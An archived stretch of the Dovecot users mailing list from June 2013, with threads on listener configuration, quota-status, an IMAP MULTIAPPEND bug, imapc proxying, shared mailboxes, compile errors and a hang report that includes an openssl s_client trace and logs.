+0200 Subject: [Dovecot] Turn off IMAPS? In-Reply-To: References: Message-ID: <201306131657.01408.inu@inusasha.de> Hi Simon, Try to add this configuration. The "Port = 0" will disable the listener. Greats, Sascha Kuehndel service imap-login { inet_listener imap { #port = 143 } inet_listener imaps { port = 0 #ssl = yes } } service pop3-login { inet_listener pop3 { #port = 110 } inet_listener pop3s { port = 0 #ssl = yes } } -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 230 bytes Desc: This is a digitally signed message part. URL: From ben at morrow.me.uk Thu Jun 13 18:07:49 2013 From: ben at morrow.me.uk (Ben Morrow) Date: Thu, 13 Jun 2013 16:07:49 +0100 Subject: [Dovecot] quota-status not working in distributed environment In-Reply-To: <201306131214.04765.benoit.panizzon@imp.ch> References: <201306131214.04765.benoit.panizzon@imp.ch> Message-ID: <20130613150749.GE58518@anubis.morrow.me.uk> At 12PM +0200 on 13/06/13 you (Benoit Panizzon) wrote: > > Or is the postfix policy daemon call to the quota-status socket documented > somewhere (it must be, but where?) so we could implement it from within the > Milter? (we use the sendmail Milter API from postfix to filter spam and > viruses, do sender/recipient rewriting, forward bounce matching, rate > limmiting, login/IP statistics to block botnets abusing phished addresses and > legal intercept stuff anyway) The quota-status protocol is just the ordinary Postfix policy delegation protocol, documented in Postfix's SMTPD_POLICY_README. I would have thought that if you give 'service quota-status' an inet_listener you could have the Postfix policy check the quota on several machines over the network, though of course the policy protocol has absolutely no security so you may not want to do that. Ben From slusarz at curecanti.org Thu Jun 13 18:22:44 2013 From: slusarz at curecanti.org (Michael M Slusarz) Date: Thu, 13 Jun 2013 09:22:44 -0600 Subject: [Dovecot] MULTIAPPEND + literal8 issue Message-ID: <20130613092244.Horde.y4olAJyyzXJaVfbn-uJApA5@bigworm.curecanti.org> Background: importing a mbox file containing ~700 messages (20 MB). Our program splits MULTIAPPENDS into approx. 5MB chunks. We don't use literal+ in order to immediately catch errors. I can reproducibly produce the following error (2.2.2) when doing a MULTIAPPEND where every append is using literal8: [...340 messages appended in 7 previous APPEND commands...] C: 10 APPEND Test "16-Dec-2011 17:19:46 -0700" ~{3128} [...~30 APPENDed messages...] C: "18-Jan-2012 12:38:21 -0700" ~{2893} S: + OK [...2893 octets of data...] C: "18-Jan-2012 22:09:41 -0700" ~{6492} S: 10 BAD Error in IMAP command APPEND: Expected '{' S: 492} BAD Error in IMAP command : Unknown command. This error occurs about 340 messages in. If I switch to using regular literals, this error does not occur. I can verify that neither the 12:38:21 message nor the 22:09:41 message alone is broken (I can put just these two in a file and import and it is successful). I can provide the mbox file privately, if needed. michael From simon.buongiorno at gmail.com Thu Jun 13 19:02:07 2013 From: simon.buongiorno at gmail.com (Simon B) Date: Thu, 13 Jun 2013 18:02:07 +0200 Subject: [Dovecot] Turn off IMAPS? In-Reply-To: <201306131657.01408.inu@inusasha.de> References: <201306131657.01408.inu@inusasha.de> Message-ID: Thanks everyone :) You'd think I could have found that on Google! Simon On 13 June 2013 16:56, InuSasha wrote: > Hi Simon, > > Try to add this configuration. > The "Port = 0" will disable the listener. > > Greats, > Sascha Kuehndel > > service imap-login { > inet_listener imap { > #port = 143 > } > inet_listener imaps { > port = 0 > #ssl = yes > } > } > > service pop3-login { > inet_listener pop3 { > #port = 110 > } > inet_listener pop3s { > port = 0 > #ssl = yes > } > } > From mrten+dovecot at ii.nl Thu Jun 13 21:18:09 2013 From: mrten+dovecot at ii.nl (Mrten) Date: Thu, 13 Jun 2013 20:18:09 +0200 Subject: [Dovecot] crash/mem violation in auth_worker + 50G logs in 2.1.7 In-Reply-To: <1371093109.24006.21.camel@innu.dovecot.net> References: <51B31526.2030609@ii.nl> <1371093109.24006.21.camel@innu.dovecot.net> Message-ID: <51BA0CE1.9040101@ii.nl> On 13/6/2013 05:11 , Timo Sirainen wrote: > Looks like there was a generic problem with how crash during > initialization was handled. This should fix all of them: > http://hg.dovecot.org/dovecot-2.2/rev/754d244b8249 OK, thanks for the fix! M. From gedalya at gedalya.net Thu Jun 13 21:32:41 2013 From: gedalya at gedalya.net (Gedalya) Date: Thu, 13 Jun 2013 14:32:41 -0400 Subject: [Dovecot] IMAPC feature description In-Reply-To: <51B98222.30909@cuppcomputing.com> References: <51B98222.30909@cuppcomputing.com> Message-ID: <51BA1049.2030703@gedalya.net> On 06/13/2013 04:26 AM, Yonatan Broza wrote: > Hi, > > I couldn't find any decent documentation about the IMAPC feature. > > Could someone please explain the purpose of this feature? > > In particular, what are the differences between IMAPC and reverse > proxying? > > Thanks. imapc implements a storage engine for dovecot, so that you can say things like: mail_location = imapc:~/imapc Your mailbox can be stored in maildir, mdbox, or imapc. This would typically be used for special purposes. Regular proxying ultimately passes the connection on to the backend server and the client is talking to that server directly, given that server's implementation of the IMAP protocol. If you do proxying using imapc, the client is talking to dovecot, dovecot serves the mailbox out of this "storage engine" which in turn translates everything into commands issued against the backend IMAP server. This more complicated setup sometimes can solve problems when the client doesn't get along well with the backend server. http://wiki2.dovecot.org/HowTo/ImapcProxy Since imapc can make a remote mailbox appear like a local dovecot mail_location, it can be very useful for migrating mailboxes from another server to dovecot. Using the pop3_migration (and maildir as the destination format) you can even preserve the pop3 UIDL order, so you basically made a perfect clone and clients should continue to work without noticing any difference whatsoever, whether they are using IMAP, POP3 or both. http://wiki2.dovecot.org/Migration/Dsync From ben at indietorrent.org Thu Jun 13 22:19:34 2013 From: ben at indietorrent.org (Ben Johnson) Date: Thu, 13 Jun 2013 15:19:34 -0400 Subject: [Dovecot] Auto-responder to handle unencrypted (and/or unsigned) email messages whose origin is not localhost Message-ID: <51BA1B46.2030102@indietorrent.org> Hi, everyone, I'm surprised how little exists on the Internet regarding this particular subject. Given the recent headlines, that is about to change, I'm sure. I have a need to send an automated response to all senders who attempt to send unencrypted and/or unsigned email to a specific mailbox on my system. (Messages originating from localhost should be exempt.) I would like for the auto-reply to include a customized message with the appropriate public PGP key contained therein. Has anyone accomplished this? If not, some basic theory as to how one might go about achieving this would be greatly appreciated. Perhaps this is a job for Dovecot's "sieve_before" directive. Would this simply be a matter of checking the message body for the expected patterns, e.g., starts with "----- BEGIN PGP MESSAGE -----", etc., etc. and sending an automated reply with the public key if the expected strings are not present? Any additional thoughts would be very helpful! Thank you in advance, -Ben From tss at iki.fi Thu Jun 13 23:23:41 2013 From: tss at iki.fi (Timo Sirainen) Date: Thu, 13 Jun 2013 23:23:41 +0300 Subject: [Dovecot] dovecot segfaults after upgrade In-Reply-To: <1371090816.24006.15.camel@innu.dovecot.net> References: <1371090816.24006.15.camel@innu.dovecot.net> Message-ID: <6AA661A8-46AB-4958-B309-330174F943BC@iki.fi> On 13.6.2013, at 5.33, Timo Sirainen wrote: > On Mon, 2013-06-10 at 12:30 +0200, Thomas Blomenkamp wrote: >> >> Using dovecot on debian oldstable (squeeze) with daily builded repository, >> after an upgrade this morning, dovecot always shows the following error: >> >> 2013 Jun 10 11:07:22 mailstore imap(tblomenk): Fatal: master: >> service(imap): child 3016 killed with signal 11 (core dumps disabled) >> Jun 10 11:07:22 mailstore kernel: [ 1589.400741] imap[3016]: segfault at >> 7fffd9048ff8 ip 00007f91417e2c3b sp 00007fffd9049000 error 6 in >> libdovecot.so.0.0.0[7f9141796000+bc000] > > Is this already fixed? If not, gdb backtraces are the best way to debug > crashes: http://dovecot.org/bugreport.html http://hg.dovecot.org/dovecot-2.2/rev/04ee59c96fc9 should fix it. From ben at indietorrent.org Thu Jun 13 23:58:14 2013 From: ben at indietorrent.org (Ben Johnson) Date: Thu, 13 Jun 2013 16:58:14 -0400 Subject: [Dovecot] Auto-responder to handle unencrypted (and/or unsigned) email messages whose origin is not localhost In-Reply-To: <51BA1B46.2030102@indietorrent.org> References: <51BA1B46.2030102@indietorrent.org> Message-ID: <51BA3266.9090906@indietorrent.org> On 6/13/2013 3:19 PM, Ben Johnson wrote: > Hi, everyone, > > I'm surprised how little exists on the Internet regarding this > particular subject. Given the recent headlines, that is about to change, > I'm sure. > > I have a need to send an automated response to all senders who attempt > to send unencrypted and/or unsigned email to a specific mailbox on my > system. (Messages originating from localhost should be exempt.) > > I would like for the auto-reply to include a customized message with the > appropriate public PGP key contained therein. > > Has anyone accomplished this? If not, some basic theory as to how one > might go about achieving this would be greatly appreciated. > > Perhaps this is a job for Dovecot's "sieve_before" directive. Would this > simply be a matter of checking the message body for the expected > patterns, e.g., starts with "----- BEGIN PGP MESSAGE -----", etc., etc. > and sending an automated reply with the public key if the expected > strings are not present? > > Any additional thoughts would be very helpful! > > Thank you in advance, > > -Ben > I was able to fulfill the objective with a sieve script. The only nuances are the inability to control the subject line of the automated reply (it always reads, "Automatically rejected mail"), and Sieve warnings that the "reject" action conflicts with the "keep" action. The only real improvement would be to use the "sieve_extprograms" plug-in to send the automated reply using sendmail or similar. Then, the contents of the automated reply could be controlled entirely, and the Sieve warnings regarding conflicting actions would disappear. Happy to answer any questions regarding implementation details. --Ben From tblomenk at math.uni-bielefeld.de Fri Jun 14 02:20:27 2013 From: tblomenk at math.uni-bielefeld.de (Thomas Blomenkamp) Date: Fri, 14 Jun 2013 01:20:27 +0200 (CEST) Subject: [Dovecot] dovecot segfaults after upgrade In-Reply-To: <6AA661A8-46AB-4958-B309-330174F943BC@iki.fi> References: <1371090816.24006.15.camel@innu.dovecot.net> <6AA661A8-46AB-4958-B309-330174F943BC@iki.fi> Message-ID: On Thu, 13 Jun 2013, Timo Sirainen wrote: > On 13.6.2013, at 5.33, Timo Sirainen wrote: > >> On Mon, 2013-06-10 at 12:30 +0200, Thomas Blomenkamp wrote: >>> >>> Using dovecot on debian oldstable (squeeze) with daily builded repository, >>> after an upgrade this morning, dovecot always shows the following error: >>> >>> 2013 Jun 10 11:07:22 mailstore imap(tblomenk): Fatal: master: >>> service(imap): child 3016 killed with signal 11 (core dumps disabled) >>> Jun 10 11:07:22 mailstore kernel: [ 1589.400741] imap[3016]: segfault at >>> 7fffd9048ff8 ip 00007f91417e2c3b sp 00007fffd9049000 error 6 in >>> libdovecot.so.0.0.0[7f9141796000+bc000] >> >> Is this already fixed? If not, gdb backtraces are the best way to debug >> crashes: http://dovecot.org/bugreport.html > > http://hg.dovecot.org/dovecot-2.2/rev/04ee59c96fc9 should fix it. > > Thanks, all seems to work now. From jon at jprice.me Fri Jun 14 05:38:23 2013 From: jon at jprice.me (Jonathon Price) Date: Thu, 13 Jun 2013 19:38:23 -0700 Subject: [Dovecot] Multiple user sharing a single mailbox Message-ID: I'm designing a system where some but not all groups of users want to share a single mailbox, i.e the user will not have there own inbox. I think this is possible by setting up a user database that returns the same mail location and possible the same home directory. This sharing would only occur in a single domain. Example User Database UserID | home | mail all at site1.example.com | /mail/home/site1.example.com/all | /mail/mailstorage/site1.example.com/all user1 at site1.example.com | /mail/home/site1.example.com/user1| /mail/mailstorage/ site1.example.com/all user2 at site1.example.com | /mail/home/site1.example.com/user2| /mail/mailstorage/ site1.example.com/all user1 at site2.example.com | /mail/home/site2.example.com/user1| /mail/mailstorage/ site2.example.com/user1 user2 at site2.example.com | /mail/home/site2.example.com/user2| /mail/mailstorage/ site2.example.com/user2 In this example all of site1.example.com users share a single mailbox, and site2.example.com users each have there own mailbox. Should the home directory also be shared, I read the comment that they should never be shared but wasn't sure if that still applied when the mailbox is the same path. For groups that are sharing a mailbox there would likely be a relatively low number of users concurrently logged in, say less than 10. For clustering we are currently limited to NFS mail storage. I was planning on using director setup so that the hashing/sharding is performed on the domain only, so all users for a domain will end up on a single node. At this stage clustering is mainly for high availability not performances. Lastly I'm concerned about possible issues with locking on the mailbox files and indexes. Will one of the mail formats reduces this risk, we can use any format as all mail will be written by Dovecot. Would giving each user there own index location help? and I assume this would mean that each user would see there own flags like read status? Does this setup sound ok, are there aspects that should change? thanks, Jon From tss at iki.fi Fri Jun 14 05:55:19 2013 From: tss at iki.fi (Timo Sirainen) Date: Fri, 14 Jun 2013 05:55:19 +0300 Subject: [Dovecot] Multiple user sharing a single mailbox In-Reply-To: References: Message-ID: On 14.6.2013, at 5.38, Jonathon Price wrote: > I'm designing a system where some but not all groups of users want to share > a single mailbox, i.e the user will not have there own inbox. I think this > is possible by setting up a user database that returns the same mail > location and possible the same home directory. This sharing would only > occur in a single domain. Should work, as long as there aren't username-specific things such as sql-dict quota where each user is updating their own quota. But maybe do this an easier way and have passdb lookup simply change the username to the shared user? You can do this by having the passdb return "user" field that contains the shared username. > Lastly I'm concerned about possible issues with locking on the mailbox > files and indexes. Will one of the mail formats reduces this risk, we can > use any format as all mail will be written by Dovecot. Would giving each > user there own index location help? and I assume this would mean that each > user would see there own flags like read status? The \Seen flag could be made per-user, preferrably with v2.2's INDEXPVT setting. Otherwise you'd have to use maildir and you'd have to manually create a dovecot-shared file to each such maildir (every time a new one is created). From raabe at froglogic.com Fri Jun 14 08:41:07 2013 From: raabe at froglogic.com (Frerich Raabe) Date: Thu, 13 Jun 2013 22:41:07 -0700 Subject: [Dovecot] Multiple user sharing a single mailbox In-Reply-To: References: Message-ID: On Jun 13, 2013, at 7:55 PM, Timo Sirainen wrote: > The \Seen flag could be made per-user, preferrably with v2.2's INDEXPVT setting. Otherwise you'd have to use maildir and you'd have to manually create a dovecot-shared file to each such maildir (every time a new one is created). Is there some documentation on the semantics of INDEXPVT? I checked the Wiki page http://wiki2.dovecot.org/SharedMailboxes/Public and also performed a full-text search for "INDEXPVT", but couldn't find anything. -- Frerich Raabe - raabe at froglogic.com www.froglogic.com - Multi-Platform GUI Testing From benoit.panizzon at imp.ch Fri Jun 14 09:15:28 2013 From: benoit.panizzon at imp.ch (Benoit Panizzon) Date: Fri, 14 Jun 2013 08:15:28 +0200 Subject: [Dovecot] quota-status not working in distributed environment In-Reply-To: <20130613150749.GE58518@anubis.morrow.me.uk> References: <201306131214.04765.benoit.panizzon@imp.ch> <20130613150749.GE58518@anubis.morrow.me.uk> Message-ID: <201306140815.29338.benoit.panizzon@imp.ch> Hi Ben thank you for your reply. > The quota-status protocol is just the ordinary Postfix policy delegation > protocol, documented in Postfix's SMTPD_POLICY_README. I would have > thought that if you give 'service quota-status' an inet_listener you > could have the Postfix policy check the quota on several machines over > the network, though of course the policy protocol has absolutely no > security so you may not want to do that. Well security is not such an issue as the mailservers are in a lan where access from outside (to prevent direct access to LMTP and other ports) is restricted anyway. So yes, they could connect that policy port from each other. But doing three connects (or even more if we add more servers) for each incomming email could cause scaling issues or performance issues if one server becomes laggy for some reason. I read about the policy protocol. It's quite simple (compared with sendmail milter). I will directly connect to the policy service on the correct machine from wihtin the milter. The milter has to do a database query anyway so I get the mailbox hostname in the same query. So I can do a IO::Socket::INET connect to the right machine which knows the quota of that recipient. Btw, the quota-status just return DUNNO or 'Quota Full'. Is there a similar easy way to check the ammount of quota used? I could then update that information in the database and use it to, for example find abandoned mailboxes. Kind regards Benoit Panizzon -- I m p r o W a r e A G - ______________________________________________________ Zurlindenstrasse 29 Tel +41 61 826 93 07 CH-4133 Pratteln Fax +41 61 826 93 02 Schweiz Web http://www.imp.ch ______________________________________________________ From canobix at gmail.com Fri Jun 14 09:33:27 2013 From: canobix at gmail.com (Gus) Date: Fri, 14 Jun 2013 08:33:27 +0200 Subject: [Dovecot] A common, read-only IMAP INBOX for all accounts Message-ID: Hi, since I had no luck finding people available on IRC, I hope someone here can provide me with some answers to, hopefully, 2 simple questions (and have the solution recorded in the archives for everyone with the same need). A little background, as the subject says it - I want to have a single INBOX shared among all the accounts on my system, where only one account would have writing rights, and all the rest would only be able to read the messages. Note this is different than providing a shared mailbox in addition to an INBOX - I actually want the shared INBOX to be the one and only folder that users can see and read as they will not be receiving any personal mails on this system. Naturally, I would also want that each account keeps track of read/unread messages independently of others. So, this is what I came up with (showing the relevant part of configuration only): # Per-user mail root and private/shared INBOX namespace userdb { driver = static args = uid=vmail gid=vmail home=/var/vmail/users/%u } namespace { type = private separator = / prefix = location = maildir:/var/vmail/public:INDEX=~/public inbox = yes } # The ACL contents of /var/vmail/public/dovecot-acl user=admin lrwstipekx anyone lrs Now, this actually results in exactly what I want (apart from a problem I'll describe below), but I'm not sure if it's the right way to do it. So the questions: 1. I have doubts that this solution could cause problems with dot file locking or dovecot data files corruption in the /var/vmail/public mailbox/directory when multiple users access the box simultaneously (and this could be thousands of users in production). Is this a valid concern and have I gone completely wrong with this solution, or there should be no problem with locking and I can keep it this way? If this is not the way to do it, can someone advise on the proper configuration that would achieve the same result, if it's possible at all (or what are the alternatives if it can't be done). 2. For testing purposes, I used a perl script (using the Maildir::Lite module) to create a test message in this mailbox (it gets stored in the new/ subdirectory, as I suppose it should). Now this message shows up as "unread" for all accounts, however when I read it in an IMAP client and then refresh the mailbox, it shows up as unread again. Per-user INDEX directory is writable and I see some files created there by dovecot, so shouldn't they contain the \Seen flags that indicate the message has been read? Is this maybe a client problem and how can I check that dovecot actually saves the flag correctly? The dovecot version I'm using is 2.0.9 (from the CentOS 6.x repositories). Thanks in advance and kind regards, Tin From christoph at out-world.com Fri Jun 14 10:11:11 2013 From: christoph at out-world.com (Christoph =?ISO-8859-1?Q?Hinterm=FCller?=) Date: Fri, 14 Jun 2013 09:11:11 +0200 Subject: [Dovecot] [Dovcot 2.2.2] Q: Prequisits for compiling and plugins Message-ID: <1371193871.2845.11.camel@starcommand> Hi Where can i find the list of prerequisites for compiling dovocot 2.2.2 form the sources, is there a dedicated link or what terms i should best use to search the archives of this mailing list, the documentation or the web? Where do I find information (links or search terms) whether plugins available for 1.x 2.1.x series, especially the metadata plugin, are still needed for 2.2.2 or may even be harmful for 2.2.2 as built in. Documentation on Dovecot webpage is rather sparse and not really conclusive concerning metadata plugin within 2.x series. On my Ubuntu 12.X systems i still find it for 2.1.x but I have difficulties to understand whether there exist a version for 2.2.X series, if this is equal to the one for 2.1.X or whether it is not needed any more for 2.2.X series. Further what libraries would be required. Greetings Christoph From olfway at gmail.com Fri Jun 14 10:12:58 2013 From: olfway at gmail.com (Pavel Volkovitskiy) Date: Fri, 14 Jun 2013 11:12:58 +0400 Subject: [Dovecot] IMAP MOVE and lazy_expunge_only_last_instance Message-ID: Hello! im testing lazy_expunge_only_last_instance here and it seems it works wrong with IMAP MOVE IN: 14 uid move 13 "INBOX" OUT: * OK [COPYUID 1188569061 13 34] Moved UIDs. * 5 EXPUNGE 14 OK Move completed. dovecot.log: 2013-06-14 10:56:06 imap(test13 at mtx.ru): Info: copy from Test: box=INBOX, uid=34, msgid=<1294858169.32435.3.camel at int.office.matrix>, size=996, from=Pavel Volkovitskiy , subject=test, flags=(\Seen) 2013-06-14 10:56:06 imap(test13 at mtx.ru): Info: copy from Test: box=.EXPUNGED/Test, uid=9, msgid=<1294858169.32435.3.camel at int.office.matrix>, size=996, from=Pavel Volkovitskiy , subject=test, flags=(\Seen) 2013-06-14 10:56:06 imap(test13 at mtx.ru): Info: expunge: box=Test, uid=13, msgid=<1294858169.32435.3.camel at int.office.matrix>, size=996, from=Pavel Volkovitskiy , subject=test, flags=(\Seen) i'm using dovecot 2:2.2.2-0~auto+64 (cfd442fcc672)? ?PS: it works well if i copy and delete mails? -- Pavel From rs at sys4.de Fri Jun 14 12:15:59 2013 From: rs at sys4.de (Robert Schetterer) Date: Fri, 14 Jun 2013 11:15:59 +0200 Subject: [Dovecot] dovecot 2.2 with lucene compile error Message-ID: <51BADF4F.1090606@sys4.de> Hi ,i get an compile error security -Werror=format-security -MT lucene-wrapper.lo -MD -MP -MF .deps/lucene-wrapper.Tpo -c lucene-wrapper.cc -fPIC -DPIC -o .libs/lucene-wrapper.o lucene-wrapper.cc: In function 'lucene_index* lucene_index_init(const char*, mailbox_list*, const fts_lucene_settings*)': lucene-wrapper.cc:128:2: error: 'else' without a previous 'if' make[5]: *** [lucene-wrapper.lo] Error 1 Best Regards MfG Robert Schetterer -- [*] sys4 AG http://sys4.de, +49 (89) 30 90 46 64 Franziskanerstra?e 15, 81669 M?nchen Sitz der Gesellschaft: M?nchen, Amtsgericht M?nchen: HRB 199263 Vorstand: Patrick Ben Koetter, Axel von der Ohe, Marc Schiffbauer Aufsichtsratsvorsitzender: Florian Kirstein From aseques at gmail.com Fri Jun 14 16:57:25 2013 From: aseques at gmail.com (Joan) Date: Fri, 14 Jun 2013 15:57:25 +0200 Subject: [Dovecot] Autocreation the home folder In-Reply-To: <5195CB0A.1050803@um.es> References: <5191CF84.9000103@um.es> <5195CB0A.1050803@um.es> Message-ID: At the moment I've not yet migrated to the new schema, the install I was testing with does not have a lot of action, so at the moment I am fixing the issues when they appear (not very frequent). On the near future, will see, I can't modify the fields in the database because I am using a fixed layout, so I might use a solution based on creating hardlinks, changing configuration, and then remove the original paths... Still I haven't tested this... Will post what I have in the future.. Regards, Joan 2013/5/17 Angel L. Mateo > El 16/05/13 12:48, Joan escribi?: > > The issue is more with legacy installs being upgraded than with new >> setups, >> on the later I might adjust the settings and start using the recoomended >> layout. >> On the alternative you suggest, if I understood properly, you are changing >> the setup to mdbox >> >>> mail_location = mdbox:%h/mdbox:INDEX=/mail/****indexes/%2Ln/%Ln >>>>> >>>> If there was a method to move automatically the mails (preferibly not >> moving to mdbox) to a subfolder, I could change to the recommended layout >> my current install. >> Otherwise it seems the only current solution is to: >> 1.- Stop dovecot >> 2.- Change to recommended layout the config >> 3.- Via a script move the content to the new location >> 4.- Start dovecot with the new layout.. >> >> Am i right? >> >> I think you could this without needind dovecto to be stopped. If > you could rewrite mail_location and mail_home in user's database, you could > do: > > 1. For every user: > 1.1. Change user's mail_location and mail_home > 1.2. Change a user to recommended layout > 2. Change the config to recommended layout > 3. Remove per user's mail_location and mail_home config > > (I'm not really sure about the right order for 1.1 and 1.2) > > Another (maybe easier) suggestion... Could you just make > /var/vmail a symlink to /home/vmail? This is no the ideal solution but it > might works. > > > > -- > Angel L. Mateo Mart?nez > Secci?n de Telem?tica > ?rea de Tecnolog?as de la Informaci?n > y las Comunicaciones Aplicadas (ATICA) > http://www.um.es/atica > Tfo: 868887590 > Fax: 868888337 > From dovecot at pupat-ghestem.net Fri Jun 14 18:00:23 2013 From: dovecot at pupat-ghestem.net (Matthieu) Date: Fri, 14 Jun 2013 17:00:23 +0200 Subject: [Dovecot] Dovecot service not responding after about a week of uptime In-Reply-To: <6AD39E2D-78BC-46C0-9018-9C948BFB9760@iki.fi> References: <514F4685.2020906@pupat-ghestem.net> <78C8CE64-3BFA-4452-B15B-AEF622ED6A36@iki.fi> <514F5B5D.4040304@pupat-ghestem.net> <4FB5DDB4-4388-428E-890B-A84C0CC39608@iki.fi> <514F5D7F.3060802@pupat-ghestem.net> <514F63D3.3030203@pupat-ghestem.net> <6AD39E2D-78BC-46C0-9018-9C948BFB9760@iki.fi> Message-ID: <51BB3007.6080108@pupat-ghestem.net> Hello, The issue of dovecot becoming unresponsive happened again but after several weeks instead of just one as before. As advised before I tried to login through the IMAP port. Entering an incorrect password gets rejected right away. Entering a correct password just hangs indefinitely. Attached are a file with the IMAPS exchange and corresponding lines in logs and another file with the output of ps aux. Thanks in advance. -------------- next part -------------- CONNECTED(00000003) depth=0 CN = mail.pupat-ghestem.net verify error:num=20:unable to get local issuer certificate verify return:1 depth=0 CN = mail.pupat-ghestem.net verify error:num=27:certificate not trusted verify return:1 depth=0 CN = mail.pupat-ghestem.net verify error:num=21:unable to verify the first certificate verify return:1 --- Certificate chain 0 s:/CN=mail.pupat-ghestem.net i:/O=Root CA/OU=http://www.cacert.org/CN=CA Cert Signing Authority/emailAddress=support at cacert.org --- Server certificate -----BEGIN CERTIFICATE----- MIIFIjCCAwqgAwIBAgIDDScrMA0GCSqGSIb3DQEBBQUAMHkxEDAOBgNVBAoTB1Jv b3QgQ0ExHjAcBgNVBAsTFWh0dHA6Ly93d3cuY2FjZXJ0Lm9yZzEiMCAGA1UEAxMZ Q0EgQ2VydCBTaWduaW5nIEF1dGhvcml0eTEhMB8GCSqGSIb3DQEJARYSc3VwcG9y dEBjYWNlcnQub3JnMB4XDTEzMDQyNTIwMjYzMVoXDTEzMTAyMjIwMjYzMVowITEf MB0GA1UEAxMWbWFpbC5wdXBhdC1naGVzdGVtLm5ldDCCASIwDQYJKoZIhvcNAQEB BQADggEPADCCAQoCggEBAPHeyTUr2t7E9vDRCBeGVpcD+STmhpXKYfrTo7Y4FWNz dY9l7kbb+Nrd6kb1zDM1z4XmdtowFwkIhNe5o+sIEgDu3P9/ts2z73X/72nLWUUm mdMm51P8CHEhfOPoNgVYAgOtU71VWvH5r9BcAPHNMGLTWsV7yPa+ml2XUV2bQyC+ UaXDSZM9yiTz6AHxyCcCbhteUlPHxZc2xl9hI7AYeB7LoopRP23kTaAo8qFxD+Ps Rk23LpJOX5ZBWS7bxSoOA6stT7DqyCuFARIoy7oA/eBwfTZ74SsjAaOTcvc0cg8N oBkGTK+E/GPiDX4HXUvH66V9l8Qf7mzYyu6OIucvulsCAwEAAaOCAQkwggEFMAwG A1UdEwEB/wQCMAAwDgYDVR0PAQH/BAQDAgOoMDQGA1UdJQQtMCsGCCsGAQUFBwMC BggrBgEFBQcDAQYJYIZIAYb4QgQBBgorBgEEAYI3CgMDMDMGCCsGAQUFBwEBBCcw JTAjBggrBgEFBQcwAYYXaHR0cDovL29jc3AuY2FjZXJ0Lm9yZy8wMQYDVR0fBCow KDAmoCSgIoYgaHR0cDovL2NybC5jYWNlcnQub3JnL3Jldm9rZS5jcmwwRwYDVR0R BEAwPoIWbWFpbC5wdXBhdC1naGVzdGVtLm5ldKAkBggrBgEFBQcIBaAYDBZtYWls LnB1cGF0LWdoZXN0ZW0ubmV0MA0GCSqGSIb3DQEBBQUAA4ICAQCIbHDBtqEt0BuA 09uofdf4L/dI60TePimcQuurs4803owrwuziyAhWiTW700gYY3yUDlNJV7pmVJ/D /E/FCOidK4EXd9Jfh+IpcsLliKBIJznQJOMjH82WyRoobsVO/D9HGQSbRkb79IFV KhzxG0aWg7vH/R9EVx7/tvGXJHCuGMc3yYx4DSEOlGWbiQkyHrQ9258z89EblX7I DhkCEqnxCfiSjwWqLqAXAMLyFNHnEv+mIsYuvvxv24xQ8HqYPmN/3vSXVzcToE1E 2MOu7vdcl3spLHwQbOR1JELBjrTaQnSM2b4ptnO3Usyse/i8P/VOZyZYyPPq51WJ Umu/dch148vVvYHXBK8oQNVDph/X+fUEPc0GWnjpeCd6hOD1/+I/xTeoqLYnHezI zxS6liS4mNXSBANCDCOjRWIMDVEPlj8Gh0SaHijSd+axpP3oKugdbDHk7ZqHLqr/ 1gjui3+oUefrCn+Kc3fqCwKMdS0CPttF8ROf/QcyUA+DxGpgTKQcGDpbNtjcXL4/ KyxvwrWkI2H3mO0GmLMnVivVfLLYF6cwm40fUvtl9UoUQyYRhdosB8m1oniyIpam 6f3ThlFOZBiviC5/VtHQZmkfwSJW1nmZy5ohIixSw3Q8FXyec5CIiqTkHPhOLeil Et0NuaFWJXIram2dV6Sbh3O/JlkPqg== -----END CERTIFICATE----- subject=/CN=mail.pupat-ghestem.net issuer=/O=Root CA/OU=http://www.cacert.org/CN=CA Cert Signing Authority/emailAddress=support at cacert.org --- No client certificate CA names sent --- SSL handshake has read 2164 bytes and written 369 bytes --- New, TLSv1/SSLv3, Cipher is DHE-RSA-AES256-SHA Server public key is 2048 bit Secure Renegotiation IS supported Compression: NONE Expansion: NONE SSL-Session: Protocol : TLSv1 Cipher : DHE-RSA-AES256-SHA Session-ID: 3CB3F11007A119AAFA6E23CE05D7E28715A32FBF2075E19591443BB9E00DFEE0 Session-ID-ctx: Master-Key: 6A9BF57188370F5525216F42F428BAC012E40FDE30FBBF8D144FB58E8666E3B4EBF3B746A52BE087099EC930189F33A9 Key-Arg : None Krb5 Principal: None PSK identity: None PSK identity hint: None TLS session ticket: 0000 - 31 ed c4 ba a1 f7 58 4a-21 5f 30 cb d5 3a 95 56 1.....XJ!_0..:.V 0010 - 13 f1 c4 19 aa 6d cc 50-2f db b7 2c 34 85 d3 1f .....m.P/..,4... 0020 - c9 56 91 d8 0b 5c 58 83-e0 09 60 a5 1d 2d f5 34 .V...\X...`..-.4 0030 - 92 c8 4f c4 2b c1 80 e8-1b da 4a 76 d6 0a 10 b5 ..O.+.....Jv.... 0040 - 4b ea ab 63 6f 78 c1 49-0a b6 48 49 96 3e 40 54 K..cox.I..HI.>@T 0050 - 56 bd 9a a5 92 ef 5d 0a-67 02 11 75 9f f1 3e 4e V.....].g..u..>N 0060 - 08 3a 34 c0 bf 76 9d 84-3a d6 fa ec 5c 23 67 b6 .:4..v..:...\#g. 0070 - 02 e0 1b ff 3d 3f c7 1b-69 64 f7 bb f0 e0 dd 6d ....=?..id.....m 0080 - d7 ad be e4 0f d9 fd 10-90 62 18 67 6a a4 77 7f .........b.gj.w. 0090 - 06 43 7f 90 4d 28 c9 31-9b 8c 20 00 cb 10 8e f7 .C..M(.1.. ..... Start Time: 1371218055 Timeout : 300 (sec) Verify return code: 21 (unable to verify the first certificate) --- * OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE AUTH=PLAIN] Dovecot ready. 001 LOGIN user badpasswd 001 NO [AUTHENTICATIONFAILED] Authentication failed. 002 LOGIN user passwd Jun 14 15:59:34 hebus dovecot: auth-worker(9593): mysql(localhost): Connected to database postfix Jun 14 15:59:34 hebus dovecot: imap-login: Login: user=, method=PLAIN, rip=192.168.173.1, lip=192.168.173.2, mpid=9596, TLS, session= -------------- next part -------------- USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.4 13576 2168 ? Ss Jun04 0:22 /sbin/init root 2 0.0 0.0 0 0 ? S Jun04 0:03 [kthreadd] root 3 0.0 0.0 0 0 ? S Jun04 0:53 [ksoftirqd/0] root 5 0.0 0.0 0 0 ? S< Jun04 0:00 